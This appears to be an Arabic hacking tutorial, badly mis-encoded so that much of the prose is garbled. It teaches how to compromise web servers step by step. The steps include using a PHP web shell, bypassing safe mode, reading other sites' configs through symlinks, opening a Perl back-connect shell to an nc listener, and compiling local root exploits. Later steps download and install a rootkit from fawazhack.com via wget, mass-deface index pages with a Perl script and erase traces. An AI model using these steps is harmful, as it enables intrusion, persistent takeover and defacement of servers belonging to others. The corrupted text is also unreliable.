‫‪٘ٚ‬مٖ ط‪ٛ‬نج أـ‪ ٟ‬اٌؼى‪٠‬ى ٌرؼهف اٌّى‪٠‬ك ػٓ اٌرظان‪٠‬ػ‬
 ‫‪ :.‬اٌرفه‪٠‬ك ت‪ ٓ١‬اٌّعٍك ‪ٚ‬اٌٍّف ‪.:‬‬
‫اٌفهق فمؾ ف‪ ٟ‬األِركاق ف‪ ٟ‬اٌشً وّا لوهٔا ٌاتماً اْ اٌّعٍك‪ِ hacker:‬عٍك الؼظ‬
‫أٗ ال‪ٛ٠‬ظك ٌٗ اِركاق ‪ٚ‬اٌٍّفاخ قائّاً ذى‪ٌٙ ْٛ‬ا أِركاق وّا لوهٔا ٌاتماً أ‪٠‬ؼاً اٌٍّف‪:‬‬
‫‪ fawazhack.php‬ف‪ ٟ‬اٌشً‬
 ‫‪ :.‬شهغ اٌظالؼ‪١‬اخ ‪.:‬‬
‫ٌّؼهفح طالؼ‪١‬اذه ف‪ ٟ‬اٌشً أٔظه أػٍ‪ ٝ‬اٌشً وّا ف‪ ٟ‬اٌظ‪ٛ‬نج اٌراٌ‪١‬ح‬

‫أ‪ ٚ‬لُ تئٌرفكاَ أِه ِؼهفح اٌظالؼ‪١‬اخ ) ‪( id‬‬

‫ف‪ ٟ‬ـأح ‪run command‬‬

‫‪ٌٛٚ‬ف ذظ‪ٙ‬ه إٌرائط‬

‫)‪uid=512(user) gid=512(user) groups=512(user‬‬

‫‪٘ٚ‬ىما ػهفٕا ا‪ ٓ٠‬ذمغ اٌظالؼ‪١‬اخ‬

‫ِارا ‪٠‬مصذ باٌصالح‪١‬اث‬

 ‫‪ :.‬شهغ اٌظالؼ‪١‬اخ ‪.:‬‬
‫ػٕك نفغ اٌشً إٌ‪ ٝ‬أؼك اٌّ‪ٛ‬الغ ٕ٘ان ل‪ٛ١‬ق ٌٍرفكاِه اٌشً‬
‫طالؼ‪١‬اخ ‪User :‬‬
‫٘مٖ اٌظالؼ‪١‬اخ ال‪ّ٠‬ىٓ لهاءج ِ‪ٛ‬لغ أـه‬
‫ذمرظه ػٍ‪ ٝ‬اٌّ‪ٛ‬لغ اٌم‪ِ ٞ‬هف‪ٛ‬ع ػٍ‪ ٗ١‬اٌشً فمؾ‬
‫شىٍ‪ٙ‬ا ف‪ ٟ‬اٌشً‬
‫)‪uid=512(user) gid=512(user) groups=512(user‬‬

‫طالؼ‪١‬اخ ‪nobody :‬‬

‫٘مٖ اٌظالؼ‪١‬اخ تئِىأه اٌرٕمً أ‪٠‬ؼاً لهاءج ٍِفاخ اٌّ‪ٛ‬الغ اٌر‪ ٟ‬ػٍ‪ٔ ٝ‬فً‬
‫اٌٍ‪١‬هفه ‪ٚ‬تئِىأه اٌرؼك‪ ً٠‬ػٍ‪ٙ١‬ا إلا وأد ِظهؼٗ‬
‫شىٍ‪ٙ‬ا ف‪ ٟ‬اٌشً‬
‫)‪uid=99(nobody) gid=99(nobody) groups=99(nobody‬‬

‫طالؼ‪١‬اخ ‪apache :‬‬

‫٘مٖ اٌظالؼ‪ ٗ١‬شث‪ٙ١‬ح تاٌظالؼ‪nobody ٗ١‬‬
‫شىٍ‪ٙ‬ا ف‪ ٟ‬اٌشً‬
‫)‪uid=404(apache) gid=404(apache) groups=404(apache‬‬

‫طالؼ‪١‬اخ ‪root :‬‬

‫٘مٖ اٌظالؼ‪١‬اخ ذؼٕ‪ِ ٟ‬ك‪٠‬ه اٌٍ‪١‬هفه ‪ٍّ٠ٚ‬ه ظّ‪١‬غ اٌظالؼ‪١‬اخ ‪ّ٠ٚ‬ىٕٗ‬
‫اٌرؼك‪ ً٠‬ػٍ‪ٍِ ٝ‬فاخ اٌّ‪ٛ‬الغ ا‪٠‬ؼاً تئِىأٗ اٌرظه‪٠‬ػ آ‪ٍِ ٞ‬ف واْ‬
‫شىٍ‪ٙ‬ا ف‪ ٟ‬اٌشً‬
‫)‪)uid=0(root) gid=0(root) groups=33(root‬‬
 ‫‪ :.‬ذفـ‪ ٟ‬اٌٍ‪١‬ف ِ‪ٛ‬ق ‪.:‬‬
‫ػٕك إـرهاق ِ‪ٛ‬لغ ِؼ‪ٚ ٓ١‬نفغ اٌشً ٌ‪ٛ‬ف ذعك آْ اٌٍ‪١‬ف ِ‪ٛ‬ق فؼاي ِّا‬
‫‪٠‬ؼـً اٌىص‪١‬ه ِٓ أ‪ٚ‬اِه اٌٍ‪١‬هفه و‪١‬ف ٔؼهف أٔٗ فؼاي ف‪ ٟ‬اٌشً الؼظ أػالٖ‬
‫‪ٌٛٚ‬ف ذعك اٌىٍّٗ اٌراٌ‪١ٌ ٗ١‬ف ِ‪ٛ‬ق‬
‫‪Safe_mode: ON‬‬
‫أ‪٠‬ؼاً ف‪٘ ٟ‬مٖ اٌؽاٌٗ ال‪ّ٠‬ىٓ ذـث‪١‬ك أ‪ٚ‬اِه اٌٍ‪ٕ١‬ىً‬
‫اٌؼًّ ٌرفـ‪ ٟ‬اٌٍ‪١‬ف نفغ ٍِف ‪php.ini‬‬
‫‪ٚ‬ؿه‪٠‬مٗ اٌهفغ ِٓ ـ‪١‬ان ‪ Upload‬ف‪ ٟ‬اٌشً‬

‫تؼك اٌهفغ لُ تؼًّ ذؽك‪٠‬س ‪ٚ refresh‬الؼظ إٌر‪١‬طج‬

‫‪٘ٚ‬مٖ ؿه‪٠‬مح ذفـ‪ ٟ‬اٌٍ‪١‬ف ِ‪ٛ‬ق ألا واْ فؼاي‬

 ‫‪ :.‬لشاءة اٌٍّفاث بصالح‪١‬ت ‪.: user‬‬
‫وّا شهؼٕا ٌاتماً ف‪ ٟ‬شهغ اٌظالؼ‪١‬اخ ‪ٚ‬اْ طالؼ‪١‬اخ اٌ‪ٛ١‬ون ِؽك‪ٚ‬قٖ‬
‫ظكاً ذّٕؼه ِٓ اٌرٕمً ت‪ ٓ١‬اٌّ‪ٛ‬الغ‬
‫الوٓ اٌـه‪٠‬مح اٌراٌ‪ ٗ١‬إْ شاءاهلل ٌ‪ٛ‬ف ٔرفـا٘ا تـه‪٠‬مٗ ظ‪١‬كٖ ‪ٔٚ‬م‪َٛ‬‬
‫تمهاءج ِؽر‪ ٜٛ‬اٌّ‪ٛ‬لغ اٌٍّر‪ٙ‬كف ػٍ‪ٔ ٝ‬فً اٌٍ‪١‬هفه‬
‫ا‪ٚ‬الً ٘مٖ اٌـه‪٠‬مح ذؼرّك ػٍ‪ ٝ‬قاٌح اٌّ‪ٙ‬ا ‪symlink‬‬
‫ٔم‪ َٛ‬تهفغ اٌٍىهتد ‪ sym2‬إٌ‪ ٝ‬اٌشً ‪ٍٔ ٚ‬رؼهػٗ ِٓ اٌّرظفػ‬
‫شأ‪١‬اً ٔم‪ َٛ‬تئؼؼان اٌ‪ٛ١‬ون ٌٍّ‪ٛ‬لغ اٌٍّر‪ٙ‬كف ف‪ٔ ٟ‬فً اٌٍ‪١‬هفه‬
‫ف‪ ٟ‬اٌٍىهتد ‪ sym2‬اٌم‪ ٞ‬نفؼٕاٖ ف‪ ٟ‬اٌشً ٔم‪ َٛ‬ت‪ٛ‬ػغ اٌّؼٍ‪ِٛ‬اخ االوِٗ‬
 ‫اٌخأت اال‪ٔ :ٌٝٚ‬م‪ َٛ‬ب‪ٛ‬ظع ‪ٛ٠‬صس اٌّ‪ٛ‬لع اٌز‪ِ ٞ‬شف‪ٛ‬ع عٍ‪ ٗ١‬اٌشً‬
‫اٌخأت اٌثأ‪١‬ت‪ٔ :‬عع ‪ٛ٠‬صس اٌّ‪ٛ‬لع اٌ‪ٙ‬ذف‬
‫اٌخأت اٌثاٌثت‪ٔ :‬عع اعُ اٌّجٍذ اٌٍ‪ ٟ‬سافع‪ ٓ١‬عٍ‪ ٗ١‬اٌغىش‪٠‬بج‬
‫اٌخأت اٌشابعت‪ٔ :‬عع ِغاس اٌٍّف اٌّشاد لشاءحٗ واِال‬

‫‪ٌٛٚ‬ف ‪٠‬أذ‪ ٟ‬تٍّفاخ اٌى‪ٔٛ‬فك ‪ٚ config‬اٌم‪٠ ٞ‬ؽر‪ ٞٛ‬ػٍ‪ ٝ‬اٌث‪١‬أاخ اٌر‪ٟ‬‬

‫ذٍىِه ف‪ ٟ‬اـرهاق اٌّ‪ٛ‬لغ اٌٍّر‪ٙ‬كف ػٍ‪ٔ ٝ‬فً اٌٍ‪١‬هفه‬
‫‪ :.‬االحصاي باٌظ‪١‬زفز عٓ طز‪٠‬ك اٌبان د‪ٚ‬ر ‪.:‬‬
‫‪connect backdoor‬‬

‫اٌثان ق‪ٚ‬ن تاٌؼهت‪١‬ح ‪٠‬مظك ت‪ٙ‬ا تاب ـٍف‪ٔٚ ٟ‬ف‪ِٕٙ ُٙ‬ا تئِىإٔا ػًّ تاب‬
‫ـٍف‪ ٟ‬تاٌٍ‪١‬هفه‬
‫اٌثان ق‪ٚ‬ن ِثهِط تٍغح اٌث‪١‬هي ‪ٚ perl‬ظ‪١‬فرٗ فرػ ِٕفم تاٌٍ‪١‬هفه ‪ٚ‬اإلذظاي‬
‫تٗ‬

‫ذشغ‪ ً١‬اٌثان ق‪ٚ‬ن‬

‫ا‪ٚ‬ال اٌثان ق‪ٚ‬ن ‪٠‬فرػ ِٕفم ‪2121‬‬
‫ٔه‪ٚ‬غ ٔرظٕد ػٍ‪ ٝ‬اٌث‪ٛ‬نخ ‪ ِٓ 2121‬إٌد واخ‬
‫‪ٔٚ‬م‪ َٛ‬تإٌرظد ػثه اٌرفكاَ األِه اٌراٌ‪ ٟ‬ف‪ ٟ‬ظ‪ٙ‬اؤا‬
‫‪nc -v -l -p 2121‬‬
‫ٔم‪ َٛ‬تهفغ ‪ backdoor.pl‬إٌ‪ ٝ‬اٌشً وّا لوهٔا ٌاتماً ؿه‪٠‬مح اٌهفغ ِٓ‬
‫اٌشً‬
‫ٔم‪ َٛ‬ت‪ٛ‬ػغ االِه اٌراٌ‪ ٟ‬ف‪ ٟ‬ـأح األ‪ٚ‬اِه وّا لوهٔا ٌاتماً أ‪٠‬ؼاً‬
‫‪perl backdoor.pl ip 2121‬‬
‫‪ :ip‬نلُ اإل‪ ٞ‬ت‪ ٟ‬اٌفاص تع‪ٙ‬اون‬
‫شُ لُ تاٌم٘اب إٌ‪ ٝ‬إٌد واخ‬
‫ٌ‪ٛ‬ف ذالؼظ أٗ ذُ االذظاي‬
 ‫اٌفصً اٌزابع‬

‫أُ٘ طزق اٌسص‪ٛ‬ي عٍ‪ ٝ‬صالز‪١‬اث اٌز‪ٚ‬ث ‪root in server‬‬

‫اٌٍ‪ٛ‬واي ر‪ٚ‬ث ‪local root‬‬
‫_ اٌخفز‪٠‬ك ب‪ ٓ١‬اٌٍ‪ٛ‬واي اٌّخزخُ ‪ٚ‬اٌغ‪١‬ز ِخزخُ‬
‫_ اٌبسث عٓ ٌ‪ٛ‬واي ر‪ٚ‬ث ‪find localroot‬‬
‫االحصاي باٌظ‪١‬زفز عبز إٌج واث ‪netcat‬‬
‫اٌسص‪ٛ‬ي عٍ‪ ٝ‬اٌز‪ٚ‬ث ‪root‬‬
‫حثب‪١‬ج اٌز‪ٚ‬ث و‪١‬ج عٍ‪ ٝ‬اٌظ‪١‬زفز‬
‫عًّ ِاص د‪٠‬فض‬
‫ِظر أثزن ِٓ اٌظ‪١‬زفز‬
 ‫‪ :.‬أُ٘ طشق اٌحص‪ٛ‬ي عٍ‪ ٝ‬صالح‪١‬اث اٌش‪ٚ‬ث ‪.:‬‬
‫‪Root in server‬‬
‫بذا‪٠‬خاً البذ ِٓ ِعشفت طشق اٌحص‪ٛ‬ي عٍ‪ ٝ‬صالح‪١‬اث اٌش‪ٚ‬ث ‪ٚ‬ح‪ٛ‬جذ عذث طشق‬
‫ألخز س‪ٚ‬ث ف‪ ٟ‬اٌغ‪١‬شفش ‪ِٕٙٚ‬ـا ‪,,‬‬
‫‪ .1‬عٓ طش‪٠‬ك اٌٍ‪ٛ‬واي س‪ٚ‬ث ‪ ٛ٘ٚ‬اعخغالي ثغشٖ بى‪١‬شًٔ اٌغ‪١‬شفش‬
‫‪ .2‬عٓ طش‪٠‬ك اعخغالي ٌثغشاث اٌبشاِج اٌخ‪ ٟ‬عٍ‪ٔ ٝ‬فظ اٌغ‪١‬شفش ا‪ ٚ‬اٌّشوبٗ عٍ‪ٗ١‬‬
‫‪ .3‬عٓ طش‪٠‬ك لشاءة بعط اٌٍّفاث اٌخ‪٠ ٟ‬ى‪ ْٛ‬ف‪ٙ١‬ا باع‪ٚٛ‬سد اٌش‪ٚ‬ث‬
 ‫‪ :.‬اٌٍ‪ٛ‬واي س‪ٚ‬ث ‪.: localroot‬‬
‫اٌٍ‪ٛ‬واي تهٔاِط ِثهِط إلٌرغالي شغهٖ تئطكان اٌى‪١‬هًٔ ‪ٚ‬اٌٍ‪ٛ‬واالخ‬
‫ِثهِعٗ تٍغح ‪ C‬ذؽراض إٌ‪ ٝ‬اٌرهظّح لثً اٌرشغ‪٘ٚ ً١‬ما أِه اٌرهظّٗ تؼك‬
‫نفغ اٌٍ‪ٛ‬واي إٌ‪ ٝ‬اٌٍ‪١‬هفه ػٓ ؿه‪٠‬ك اٌشً‬
‫ٔم‪ َٛ‬ترٕف‪١‬م األِه اٌراٌ‪ٟ‬‬
‫‪gcc local.c -o local‬‬
 ‫‪ :.‬اٌخفش‪٠‬ك ب‪ ٓ١‬اٌٍ‪ٛ‬واي اٌّخشجُ ‪ٚ‬اٌغ‪١‬ش اٌّخشجُ ‪.:‬‬
‫أ‪ٚ‬الً إلا واْ اٌٍ‪ٛ‬واي أٔر‪ٙ‬ا تئِركاق ‪ c‬فٕؼهف أٔٗ غ‪١‬ه ِرهظُ‬
‫اٌٍ‪ٛ‬واي اٌّرهظُ أِا اْ ‪ٕ٠‬ر‪ ٟٙ‬ق‪ ْٚ‬أِركاق اٌٍ‪ ٟ‬أ‪ ٚ‬غ‪١‬هٖ‬
‫‪ٚ‬ذموه قائّاً اْ اٌٍ‪ٛ‬واي ِرهظُ تٍغح ‪ٚ c‬اٌٍثة ف‪ ٟ‬لاٌه اْ ٔ‪ٛ‬اج اٌى‪١‬هًٔ‬
‫ف‪ٔ ٟ‬ظاَ اٌٍ‪ٕ١‬ىً ذى‪ِ ْٛ‬ثهِعح تٍغح اٌٍ‪c ٟ‬‬
 ‫‪ :.‬اٌبحث عٓ ٌ‪ٛ‬واي س‪ٚ‬ث ‪.:‬‬
‫ذ‪ٛ‬ظك ِ‪ٛ‬الغ ذ‪ٙ‬رُ ف‪٘ ٟ‬ما اٌّعاي ‪ٚ‬وّا لوهٔا ٌاتماً ف‪ ٟ‬اٌفظً األ‪ٚ‬ي ف‪ٟ‬‬
‫ِعاي اٌصغـهج ‪ Vulnerabilities‬تؼغ اٌّ‪ٛ‬الغ اٌر‪ ٟ‬ذ‪ٙ‬رُ ف‪ِ ٟ‬عاي اٌصغهاخ‬
‫أ‪٠‬ؼاً ٘‪١‬ا ذ‪ٙ‬رُ ف‪ ٟ‬اٌٍ‪ٛ‬واالخ ‪ٕ٘ٚ‬ا ٔؼغ ِ‪ٛ‬لغ ٌٍرـث‪١‬ك ػٍ‪ ٗ١‬ف‪ِ ٟ‬عاي اٌثؽس ػٓ‬
‫اٌٍ‪ٛ‬واي ن‪ٚ‬خ ٔم‪ َٛ‬تاٌم٘اب إٌ‪ ٝ‬أؼك اٌّ‪ٛ‬الغ‬
‫‪/http://www.exploit-db.com‬‬

‫ػٕك اٌكـ‪ٛ‬ي ٌٍّ‪ٛ‬لغ ذ‪ٛ‬ظك ػكخ ـ‪١‬اناخ ٔم‪ َٛ‬تاٌم٘اب إٌ‪ ٝ‬اٌثؽس‬
‫تؼك اٌكـ‪ٛ‬ي ػٍ‪ ٝ‬ـأح اٌثؽس ٔم‪ َٛ‬ا‪ ْ٢‬تإٌظه إٌ‪ ٝ‬اٌشً ‪ٔٚ‬ه‪ٛٔ ٜ‬ع إٌظاَ‬
‫‪ٚ‬ذؽك‪٠‬صٗ وّا ف‪ ٟ‬اٌظ‪ٛ‬نج اٌراٌ‪١‬ح‬

‫الؼظ أِاَ ‪ٛ٠ uname –a‬ظك ٔ‪ٛ‬ع إٌظاَ ‪ ٚ‬اٌرؽك‪٠‬س ‪2.6.18‬‬

‫ٔم‪ َٛ‬األْ ت‪ٛ‬ػغ ف‪ ٟ‬ـأح اٌثؽس ف‪ ٟ‬اٌّ‪ٛ‬لغ‬
‫‪ Local 2.6.18‬ا‪ localroot 2.6.18 ٚ‬ا‪ٚ‬‬
‫‪local root exploit 2.6.18‬‬
‫‪ٚ‬وما تئلْ اهلل ٔؽظً ػٍ‪ ٝ‬اٌٍ‪ٛ‬واي‬
 ‫الغ‬ٌّٛ‫ٕ٘ا تؼغ ا‬ٚ
http://www.exploit-db.com

http://www.milw0rm.com/local.php

http://www.kernel.org/pub/linux

http://www.securityfocus.com

‫ ِعاي‬ٟ‫ي ف‬ٚ‫ اٌفظً األ‬ٌٝ‫ إ‬ٌٝ‫ع إ‬ٛ‫ لُ تاٌهظ‬ٚ‫أ‬

Vulnerabilities ‫اٌصغـهج‬

ً‫ل‬ٛ‫ك ِؽهواخ اٌثػز ِصً ل‬٠‫ ػٓ ؿه‬ٚ‫ا‬

local root exploit 2.6.18
 ‫‪ :.‬االحصاي باٌغ‪١‬شفش عبش ‪.: netcat‬‬
‫لثً اٌؽظ‪ٛ‬ي ػٍ‪ ٝ‬اٌٍ‪ٛ‬واي ن‪ٚ‬خ ‪ٍ٠‬ىِٕا االذظاي تاٌٍ‪١‬هفه ػثه أقاج إٌد‬
‫واخ ٔم‪ َٛ‬تاٌكـ‪ٛ‬ي إٌ‪ِٛ ٝ‬ظح اٌك‪ٚ‬ي أ‪ِٛ ٚ‬ظح األ‪ٚ‬اِه‬
‫شُ ٔم‪ َٛ‬تاٌرٕظد ػثه األِه اٌراٌ‪ ٟ‬ف‪ِٛ ٟ‬ظح اٌك‪ٚ‬ي‬
‫‪nc –v –l –p port‬‬
‫تكي وٍّح ‪ port‬تإٌّفم اٌّهاق اٌرٕظد تٗ وّا ف‪ ٟ‬اٌظ‪ٛ‬نج اٌراٌ‪١‬ح‬

‫ا‪ ْ٢‬لُ تاٌم٘اب إٌ‪ ٝ‬اٌشً ‪ٚ‬ال٘ة إٌ‪ ٝ‬األٌفـً ٌ‪ٛ‬ف ذعك‬
‫‪back-connect‬‬
 ‫ف‪٘ ٟ‬مٖ اٌفأاخ اٌصالز ‪٠‬ـٍة‬
‫‪٠ Ip‬مظك ت‪ٙ‬ا إ‪ ٞ‬ت‪ ٟ‬ظ‪ٙ‬اون‬
‫‪ Port‬إٌّفم اٌم‪ ٞ‬لّد تاٌرٕظد تـٗ‬
‫‪ Use‬قػ‪ٙ‬ا ػٍ‪ِ ٝ‬ا٘‪١‬ا‬
‫شُ لُ تاٌؼغؾ ػٍ‪connect ٝ‬‬
‫‪ٚ‬ل٘ة إٌ‪ ٝ‬إٌد واخ ‪ٌٛٚ‬ف ذعك أٗ ذُ االذظاي تاٌٍ‪١‬هفه‬
 ‫‪ :.‬اٌحص‪ٛ‬ي عٍ‪ ٝ‬اٌٍ‪ٛ‬واي س‪ٚ‬ث ‪.:‬‬
‫أ‪ٚ‬الً التك ِٓ االذظاي تإٌد واخ‬
‫ٔم‪ َٛ‬تهفغ اٌٍ‪ٛ‬واي إٌ‪ ٝ‬اٌٍ‪١‬هفه التك ِٓ نفؼٗ إٌ‪ِ ٝ‬عٍك ‪٠‬ؽًّ اٌرظان‪٠‬ػ‬
‫اٌىاٍِٗ ‪777‬‬
‫أْ واْ اٌٍ‪ٛ‬واي غ‪١‬ه ِرهظُ ٔم‪ َٛ‬تئػـائٗ أ‪٠‬ؼاً اٌرظان‪٠‬ػ اٌىاٍِح ‪777‬‬
‫تاألِه اٌراٌ‪ٟ‬‬

‫‪chmod 777 local.c‬‬

‫‪ٔٚ‬م‪ َٛ‬تؼك إػـائٗ اٌرظان‪٠‬ػ اٌىاٍِح ترهظّرٗ تاألِه اٌراٌ‪ٟ‬‬
‫‪gcc local.c –o local‬‬
‫تؼك ‪ٚ‬ػغ األِه اٌراٌ‪ ٟ‬ذُ ذهظّح اٌٍ‪ٛ‬واي ‪ٌٛٚ‬ف ذعكج واٌراٌ‪local ٟ‬‬
‫ق‪ ْٚ‬اِركاق وّا لوهٔا ٌاتماً‬
‫شُ ٔم‪ َٛ‬تئػـاء اٌٍ‪ٛ‬واي اٌّرهظُ اٌرظان‪٠‬ػ اٌىاٍِٗ‬
‫‪chmod 777 local‬‬
‫ٔم‪ َٛ‬ا‪ ْ٢‬ترشغ‪ ً١‬اٌٍ‪ٛ‬واي تاألِه اٌراٌ‪ٟ‬‬
‫‪./local‬‬
‫ٔم‪ َٛ‬ا‪ ْ٢‬ت‪ٛ‬ػغ األِه ػهع اٌظالؼ‪١‬اخ‬
‫‪id‬‬
‫ا‪ ْ٢‬طالؼ‪١‬اذٕا ‪root‬‬
‫ٔم‪ َٛ‬ا‪ ْ٢‬ترٕف‪١‬م األِه‬
‫‪su‬‬
‫ألـم اٌه‪ٚ‬خ واًِ ‪ٚ‬اٌىّاي هلل ‪ٚ‬ؼكٖ‬
 ‫‪ :.‬حثب‪١‬ج اٌش‪ٚ‬ث و‪١‬ج عٍ‪ ٝ‬اٌغ‪١‬شفش ‪.:‬‬
‫تؼك اٌؽظ‪ٛ‬ي ػٍ‪ ٝ‬طالؼ‪١‬اخ اٌه‪ٚ‬خ ٔم‪ َٛ‬ا‪ ْ٢‬ترصث‪١‬د اٌه‪ٚ‬خ و‪١‬د اٌفائكج‬
‫ِٕٗ ٌٍهظ‪ٛ‬ع ٌٍٍ‪١‬هفه تؼك إطـ‪١‬اق اٌشً ‪ٚ‬إواٌرح ‪ٚ‬أؼر‪١‬اؿ‪١‬اً ػٕك إواٌح‬
‫اٌشً اٌم‪ ٞ‬ونػٕاٖ ف‪ ٟ‬اٌٍ‪١‬هفه ػًّ اٌه‪ٚ‬خ و‪١‬د األٌاٌ‪ ٟ‬فرػ ِٕفم‬
‫تاٌٍ‪١‬هفه ‪ٚ‬اظافح ‪ٛ٠‬ون ‪٠‬ؽًّ طالؼ‪١‬اخ ن‪ٚ‬خ ٌؼّاْ نظ‪ٛ‬ػٕا ٌٍٍ‪١‬هفه‬
‫ِهٖ أـه‪ ٜ‬أ‪ٚ‬الً ٔم‪ َٛ‬تٍؽة اٌه‪ٚ‬خ و‪١‬د ف‪ ٟ‬إ‪ِ ٞ‬ىاْ تاٌٍ‪١‬هفه تئٌرفكاَ‬
‫اِه اٌٍؽة‬
‫‪wget http://fawazhack.com/update/rootkit-v1.0.zip‬‬

‫شُ ٔم‪ َٛ‬تفه اٌؼغؾ ػٓ اٌه‪ٚ‬خ و‪١‬د تئٌرفكاَ أِه اٌفه‬

‫‪Unzip rootkit-v1.0.zip‬‬
‫شُ ٔم‪ َٛ‬تاٌكـ‪ٛ‬ي ػٍ‪ ٗ١‬تاألِه‬
‫‪cd v1.0‬‬
‫‪ٛ٠‬ظك ػكخ ٍِفاخ ف‪ِ ٟ‬عٍك اٌه‪ٚ‬خ و‪١‬د ٔم‪ َٛ‬األْ تئػـاء اٌٍّف‬
‫األٌاٌ‪ ٟ‬ف‪ ٟ‬اٌه‪ٚ‬خ و‪١‬د ‪ٛ٘ٚ‬‬
‫ٔم‪ َٛ‬تئػـاء ‪ Setup‬اٌرظان‪٠‬ػ اٌىاًِج ‪777‬‬

‫‪chmod 777 setup‬‬

‫ٔم‪ َٛ‬األْ فمؾ ترشغ‪ ً١‬اٌه‪ٚ‬خ و‪١‬د ػٍ‪ ٝ‬اٌٍ‪١‬هفه تاألِه اٌراٌ‪ٟ‬‬
‫‪./setup password port‬‬
‫الؼظ األِه ‪٠‬رى‪ ِٓ ْٛ‬نلُ ٌه‪ِٕٚ ٚ ٞ‬فم‬
‫ٔم‪ َٛ‬ت‪ٛ‬ػغ تكاي ‪ password‬نلُ ٌه‪ٞ‬‬
‫تكاي ‪ٔ port‬م‪ َٛ‬ت‪ٛ‬ػغ ِٕفم ِؼ‪ ٛ٘ٚ ٓ١‬اٌم‪ٔ ٞ‬ه‪٠‬ك االذظاي ػٍ‪ ٗ١‬تؼك‬
‫ذهو‪١‬ة اٌه‪ٚ‬خ و‪١‬د‬
 ‫ٔم‪ َٛ‬تاألٔرظان لٍ‪١‬الً ن‪٠‬صّا ‪ٕ٠‬ر‪ ٟٙ‬ػًّ اٌه‪ٚ‬خ و‪١‬د‬
‫تؼك ذصث‪١‬د اٌه‪ٚ‬خ و‪١‬د ٔم‪ َٛ‬األْ تئٌرفكاَ تهٔاِط ‪putty ٍّٝ٠‬‬

‫ف‪ ٟ‬ـأح )‪host name(or IP address‬‬

‫ٔم‪ َٛ‬ت‪ٛ‬ػغ إ‪ ٞ‬ت‪ ٟ‬اٌٍ‪١‬هفه‬
‫‪ٚ‬ف‪ ٟ‬ـأح ‪ port‬اٌث‪ٛ‬نخ اٌم‪ٚ ٞ‬ػؼٕاٖ ف‪ ٟ‬اٌه‪ٚ‬خ و‪١‬د‬
‫شُ ٌ‪ٛ‬ف ذأذ‪ ٟ‬اٌشاشح اٌٍ‪ٛ‬قاء‬
 ‫ا‪ ْ٢‬لُ تىراتح اٌ‪ٛ١‬ون‬
‫‪Root‬‬
‫اٌهلُ اٌٍه‪ ٞ‬اٌم‪ٚ ٞ‬ػؼٕاٖ ف‪ ٟ‬اٌه‪ٚ‬خ و‪١‬د‬
‫لُ ت‪ٛ‬ػؼٗ ا‪ِ ْ٢‬غ اٌؼٍُ ػٕك وراتح اٌهلُ اٌٍه‪ ٞ‬ال‪٠‬ظ‪ٙ‬ه‬
‫‪ٚ‬اٌؽّك هلل ذُ االذظاي‬
 ‫‪ :.‬عًّ ِاط د‪٠‬فظ ‪.:‬‬
‫اٌّاي ق‪٠‬فً ‪ٚ‬ظ‪١‬فرٗ ‪٠‬م‪ َٛ‬ترغ‪١‬ه ظّ‪١‬غ طفؽاخ اٌّ‪ٛ‬الغ اٌهئ‪١ٍ١‬ح‬
‫‪١ِٚ‬ىذٗ اٌع‪١‬كج أْ واْ األٔكوً ف‪ِ ٟ‬عٍك ‪ٚ‬ف‪٘ ٟ‬ما اٌّعٍك ِعٍك أـه ‪ٚ‬شُ‬
‫‪٠ index.php‬م‪ َٛ‬ترغ‪١‬ه٘ا ‪٘ٚ‬مٖ أفؼً ِ‪١‬ىاذٗ‬
‫أْ واْ اٌٍ‪١‬هفه ‪٠‬ؽًّ ِ‪ٛ‬الغ وص‪١‬هج ِٓ اٌّرؼة أْ ذم‪ َٛ‬ترغ‪١‬ه األٔكوً‬
‫‪ٚ‬اؼكاً ذٍ‪ ٛ‬األـه ٘مٖ االقاٖ ذم‪ َٛ‬ترغ‪١‬ه ظّ‪١‬غ اٌظفؽاخ اٌهئ‪١ٍ١‬ح ق‪ْٚ‬‬
‫ِه‪ٚ‬نن ػٍ‪ ٝ‬اٌظفؽاخ اٌهئ‪١ٍ١‬ح ٌٍّ‪ٛ‬الغ ‪ٚ‬ذغ‪١١‬ه٘ا‬
‫اٌٍىهتد ِثهِط تٍغح اٌث‪١‬هي ‪perl‬‬
‫ٔم‪ َٛ‬ترشغ‪ٍٗ١‬‬
‫ٔم‪ َٛ‬تٍؽة اٌٍّف إٌ‪ ٝ‬إ‪ِ ٞ‬ىاْ تاٌٍ‪١‬هفه‬

‫‪wget http:// /fawazhack.com/update/md.zip‬‬

‫ٔم‪ َٛ‬األْ بفه اٌؼغؾ‬
‫‪unzip md.zip‬‬
‫تؼك فه اٌؼغؾ ػٓ األقاٖ ٔم‪ َٛ‬ت‪ٛ‬ػغ األِه اٌراٌ‪ٟ‬‬

‫إلظ‪ٙ‬ان ـ‪١‬اناخ األقاٖ‬

‫‪perl mass.pl‬‬
 ‫اٌف‪١‬اناخ ف‪ ٟ‬األقاٖ ‪ٚ‬ؿه‪٠‬مح ذشغ‪ٍٙ١‬ا‬
‫>‪musage : perl mass.pl <path too u're index‬‬
‫‪mexample : perl mass.pl /tmp/index.html‬‬

‫اٌّىاْ اٌٍ‪ ٟ‬نافؼ‪ ٓ١‬ػٍ‪ ٗ١‬طفؽح االـرهاق ‪<path too u're index‬‬

‫ؼر‪٠ ٝ‬ثم‪ tmp ٝ‬االْ ٍٔؽة طفؽح االـرهاق ػٍ‪ ٝ‬اٌٍ‪١‬هفه ػٍ‪ِ ٝ‬عٍك‬
‫أِه اٌرشغ‪ً١‬‬

‫األْ ٔشغً اٌٍىهتد تأِه ذشغ‪ً١‬‬

‫‪perl mass.pl /tmp/index.html‬‬

‫إلظ‪ٙ‬ان اٌّ‪ٛ‬الغ اٌر‪ ٟ‬ػٍ‪ ٝ‬اٌٍ‪١‬هفه‬

‫‪http://whois.webhosting.info‬‬

‫لُ تاٌكـ‪ٛ‬ي إٌ‪ ٝ‬اٌّ‪ٛ‬لغ ‪ٚٚ‬ػغ إ‪ ٞ‬ت‪ ٟ‬اٌٍ‪١‬هفه شُ ِ‪ٛ‬افك ‪ٚ‬تؼك٘ا إػغؾ‬
‫ػٍ‪ٔ ٝ‬فً إ‪ ٞ‬ت‪ ٟ‬اٌٍ‪١‬هفه ف‪ ٟ‬اٌّ‪ٛ‬لغ ‪ٚ‬ذظ‪ٙ‬ه إٌرائط‬
 .: ‫شفش‬١‫ ِغح أثاسن ِٓ اٌغ‬:.
‫هفه‬١ٌٍ‫ ا‬ٍٝ‫فً التك ٍِػ أشانن ػ‬٠‫تؼك ػًّ اٌّاي ق‬
